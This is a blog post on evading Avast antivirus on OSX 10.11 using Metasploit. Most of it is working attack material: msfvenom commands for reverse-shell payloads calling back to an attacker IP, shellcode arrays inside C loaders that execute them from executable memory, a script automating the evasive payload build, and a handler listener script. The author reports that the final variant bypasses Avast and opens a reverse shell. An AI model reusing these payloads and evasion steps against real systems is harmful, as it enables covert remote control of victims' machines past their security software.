Bypassing antivirus on OSX 10.11 with Metasploit – Avast

Lets see how good some of the Antivirus products are nowdays on a modern OSX system. Simply googling the OSX antivirus ; the first hit I get is Avast Free Mac Security. So the first part of the testing runs will be on OSX 10.11.4 El Captain and Avast 12.7

Installation is pretty straight forward, so lest see how is Metasploit holding against it.

Lets try a simple OSX binary payload on our Linux machine with metasploit framework installed

# ./msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f macho > test.osx
# ./msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f macho > test64.osx

test.osx and test64.osx get detected immediately on the SMB share

Now lets see our luck with Java jar payload

# ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 > test.jar

Gets detected upon execution of test.jar on the OSX (need Java JDK for this)

So our old tricks don’t work anymore ..

So we need to try to be smarter and use some customization …

./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.1.101 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho > newtest.64.osx

newest.64.osx gets detected immediately on the SMB share

So we will need to compile our own code to bypass Avast

Goto hpc.sourceforge.net and download gcc7.1 to try and build some OSX 10.11 binaries
Thats pretty standard once the gcc7.1.tar is downloaded you need to extract it to /usr on OSX and let Xcode console stuff install.

Lets try some custom C code

./msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c > shellcode.c

And paste the shellcode.c to the template

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = 
"\x68\xc0\xa8\x01\x65\x68\xff\x02\x01\xbb\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";
 
main()
{
 int (*ret)() = (int(*)())code;
 ret();
}

Copy the code to the OSX and compile

$ gcc test.c - o test.osx

Gets picked up by Avast immediately during compilation

So lets see what encoders/payloads we have in msfvenom that can be used for OSX

$ ./msfconsole --list
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
osx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute
osx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, executeosx/
osx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell

So lets try one more custom code

./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.1.101 LPORT=443 -a x64 --platform OSX -e x64/xor -f c -o test.c

Add the test.c shellcode to this template

#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <unistd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>

unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xe6\x84\xaf\xdf\x92\x78\x92\x7c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x5e\xe5\xaf\xdf\x90\x12"
"\x90\x23\x8c\x85\xf1\x97\xa3\xaa\x9d\x79\xaf\x0d\x6b\x97\x1b"
"\xbf\x2a\x1e\xe6\x84\xad\x97\xa3\x8e\xc4\x34\x58\x84\xad\xde"
"\x29\xb8\x3a\x7d\x83\xd2\xe7\x56\x74\x12\x82\x26\xe9\x81\xe3"
"\x56\x75\xc0\xc8\x7c\xe6\x86\xe7\xee\x64\x77\x97\xc4\xbc\x84"
"\xaf\xdd\xda\x87\x54\x73\xe3\xcc\x9e\x1f\x2a\x43\x92\x7c\xe4"
"\x6c\xa7\xdf\x92\x78\xbd\x1e\x8f\xea\x80\xac\xfa\x78\xda\xf7"
"\xda\xa0\xe7\xee\x40\x2a\xc5\x34\x6f\x62\xa0\xda\x92\x78\x92"
"\x7c";

int main(int argc, char **argv)
{
void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
printf("ret: 0x%x",ptr);
memcpy(ptr,buf,sizeof buf);
void (*fp)() = (void (*)())ptr;
fp();

}

On OSX compile the code va GCC

$ gcc newtest.c -o newtest.osx 
$ ./newtest.osx

This one works well and we can bypass Avast on OSX and get a reverse shell,

Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh

Update: I had a bug here; forgot to incude the $port and $IP variables :) – fixed

#!/bin/bash
clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
 echo '[-] Something went wrong .. '
exit 0
fi

And the listener LISTENER-MAC-LATEST.sh

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

Video

https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/

https://astr0baby.wordpress.com/2017/07/14/bypassing-antivirus-on-osx-10-11-with-metasploit-bitdefender/

https://astr0baby.wordpress.com/2017/07/14/bypassing-antivirus-on-osx-10-11-with-metasploit-kaspersky/

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

5 Responses to Bypassing antivirus on OSX 10.11 with Metasploit – Avast

  1. Pingback: 【知识】7月14日 - 每日安全知识热点 - 莹莹之色

  2. Pingback: 【知识】7月14日 – 每日安全知识热点-安全路透社

  3. Pingback: 【知识】7月14日 – 每日安全知识热点 – 安百科技

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s